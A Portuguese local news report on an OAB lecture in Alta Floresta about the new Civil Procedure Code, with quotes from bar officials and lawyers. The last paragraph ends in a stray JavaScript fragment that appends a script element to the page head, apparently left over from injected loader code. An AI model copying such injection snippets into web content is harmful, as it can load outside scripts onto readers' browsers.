Capa / Cidades / Curso sobre novo CPC, é ministrados á advogados de Alta Floresta

Curso sobre novo CPC, é ministrados á advogados de Alta Floresta

KODAK Digital Still Camera

Da Redação

A 8ª Subseção da Ordem dos Advogados do Brasil realizou na noite desta segunda-feira, 15, uma palestra com o defensor público Paulo Roberto Marquezine da Silva, que abordou as principais alterações no novo Código de Processo Civil, que entra em vigor no dia 17 de março deste ano. O curso é direcionado aos advogados, mas a OAB aceitou também a participação de bacharéis e estudantes em fase final de formação, como forma de disponibilizar as informações para a maioria dos causídicos que atuam na área de abrangência da subseção altaflorestense.
Para o presidente da OAB, advogado Celso Reis de Oliveira, é “imprescindível o acompanhamento das inovações legislativas”, aos profissionais do direito e a possibilidade de acompanhar um curso com as chancelas da Ordem dos Advogados do Brasil e da ESA Escola Superior de Advocacia, precisa ser vista de maneira positiva pela classe. “É o caminho pelo qual o advogado vai andar na busca da defesa do direito de seu cliente, então é imprescindível que todos dominem bem está técnica”, apostou o dirigente da entidade que abrange os advogados.
Celso Reis fez questão de agradecer não só aos advogados que compareceram, mas principalmente ao Defensor Público Paulo Marquezine, que é formado em direito pela universidade de São Paulo, tendo feito mestrado pela mesma entidade, e os advogados membros da sua diretoria, pelo empenho na realização da tarefa.
“Nós somos muito gratos à disponibilidade do dr Paulo Marquezine e também queremos agradecer aos advogados Nilton de Souza Arantes, que é o coordenador geral deste curso e Nilton Nunes Gabriel que é coordenador pedagógico, isso demonstra que os colegas estão unidos em busca de um mesmo ideal, que é fortalecer a nossa advocacia”, afirmou.
O Advogado Nilton Junior, que participou do curso, avaliou como positivo o encontro, dada a possibilidade de discutir as alterações do novo Código. “A partir de meados de março, somos obrigados a ajuizar as ações conforme a pertinência legal das regras do Novo CPC. Qualquer descuido processual pode cercear o direito do cliente, portanto quem não estiver qualificado para atuar conforme a nova legislação certamente vai prejudicar sua clientela”, afirmou o advogado, que é da “nova safra” de profissionais de direito de Alta Floresta.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top